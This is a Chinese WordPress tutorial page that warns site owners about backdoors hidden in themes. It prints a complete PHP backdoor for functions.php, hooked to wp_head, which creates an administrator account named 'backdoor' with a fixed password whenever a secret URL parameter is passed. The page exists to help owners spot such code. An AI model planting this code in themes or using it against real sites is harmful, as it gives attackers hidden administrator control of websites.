欢迎来到入门教程网!

WordPress

当前位置:主页 > CMS教程 > WordPress >

防范wordpress主题加后门代码获取管理员权限

来源:本站原创|时间:2020-01-11|栏目:WordPress|点击:


复制代码
代码如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……

上一篇:wordpress无法登录后台的解决方案

栏    目:WordPress

下一篇:wordpress全局变量$wpdb初始化并声明为全局变量的方法

本文标题:防范wordpress主题加后门代码获取管理员权限

本文地址:https://www.xiuzhanwang.com/a1/WordPress/12808.html

网页制作CMS教程网络编程软件编程脚本语言数据库服务器

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:835971066 | 邮箱:835971066#qq.com(#换成@)

Copyright © 2002-2020 脚本教程网 版权所有